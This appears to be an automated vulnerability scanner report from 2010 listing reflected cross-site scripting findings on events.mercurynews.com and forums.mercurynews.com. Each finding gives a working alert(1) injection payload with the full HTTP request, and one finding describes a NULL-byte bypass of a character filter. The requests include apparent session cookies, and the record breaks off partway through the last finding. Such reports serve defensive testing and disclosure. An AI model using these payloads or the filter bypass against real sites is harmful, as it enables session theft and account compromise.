Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://events.mercurynews.com/ [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac11"><script>alert(1)</script>811b9446da5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8ac11"><script>alert(1)</script>811b9446da5=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?8ac11"><script>alert(1)</script>811b9446da5=1" /> ...[SNIP]...
1.2. http://events.mercurynews.com/movies [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca30"><script>alert(1)</script>9fc7022dbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?bca30"><script>alert(1)</script>9fc7022dbe7=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/movies?bca30"><script>alert(1)</script>9fc7022dbe7=1" /> ...[SNIP]...
1.3. http://events.mercurynews.com/performers [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/performers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa537"><script>alert(1)</script>081b4c1c4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /performers?aa537"><script>alert(1)</script>081b4c1c4b2=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/performers?aa537"><script>alert(1)</script>081b4c1c4b2=1" /> ...[SNIP]...
1.4. http://events.mercurynews.com/restaurants [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33257"><script>alert(1)</script>16f8b094cda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?33257"><script>alert(1)</script>16f8b094cda=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/restaurants?33257"><script>alert(1)</script>16f8b094cda=1" /> ...[SNIP]...
1.5. http://events.mercurynews.com/venues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.mercurynews.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 305e4"><script>alert(1)</script>1a2aba766b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?305e4"><script>alert(1)</script>1a2aba766b3=1 HTTP/1.1 Host: events.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; zvents_tracker_sid=L_surqrJ_TtgeiTUn7vSyg.93565011; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlM2Q1MTFiYWE1OGUyOTlkOGNiMzQ1ZTQxZDhkZmFhZmUiDWxvY2F0aW9uexAiC3JhZGl1c2keIgljaXR5Ig1TYW4gSm9zZSIKZXJyb3JGIg1sYXRpdHVkZWYaMzcuMzE2NDk5OTk5OTk5OTk4AJeNIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyITZGlzcGxheV9zdHJpbmciEVNhbiBKb3NlLCBDQSISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTEyMS44NzQALQ4iEXdoZXJlX3N0cmluZ0ASIgpzdGF0ZSIHQ0E%3D--15608a1ab545c581dffcd09fee6db6e51e073270; s_sq=%5B%5BB%5D%5D; welcome=L_surqrJ_TtgeiTUn7vSyg.93565011; __qca=P0-1453715116-1289775685507;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/venues?305e4"><script>alert(1)</script>1a2aba766b3=1" /> ...[SNIP]...
1.6. http://forums.mercurynews.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e58"-alert(1)-"da78a3fd75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?91e58"-alert(1)-"da78a3fd75c=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:11:57 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=6ec373c57579c10d331d00c8ebed1d1d; expires=Wed, 08 Dec 2010 02:45:17 GMT; path=/; domain=.forums.mercurynews.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 14 Nov 2010 23:12:21 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 50878
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45812"-alert(1)-"613868a3771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum45812"-alert(1)-"613868a3771/576 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22096
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79cf3"-alert(1)-"89396556484 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/57679cf3"-alert(1)-"89396556484 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:00 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16253
1.9. http://forums.mercurynews.com/forum/576 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/576
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb6"-alert(1)-"9c54b14f479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/576?4beb6"-alert(1)-"9c54b14f479=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6416f"-alert(1)-"3bf608c035c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum6416f"-alert(1)-"3bf608c035c/business-technology-business-news HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:23 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:47 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22156
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67461"-alert(1)-"eb6ddd1910a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news67461"-alert(1)-"eb6ddd1910a HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:32 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:56 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16333
1.12. http://forums.mercurynews.com/forum/business-technology-business-news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/business-technology-business-news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931e2"-alert(1)-"60a68e53a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/business-technology-business-news?931e2"-alert(1)-"60a68e53a4e=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:10 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:34 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20988
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ec4"-alert(1)-"16924a4f316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumf7ec4"-alert(1)-"16924a4f316/news HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:38 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22098
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54941"-alert(1)-"d801b306391 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news54941"-alert(1)-"d801b306391 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:44 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 16072
1.15. http://forums.mercurynews.com/forum/news [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/forum/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9da1"-alert(1)-"992e5590b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum/news?c9da1"-alert(1)-"992e5590b97=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:24 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19272
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:21 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22112
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
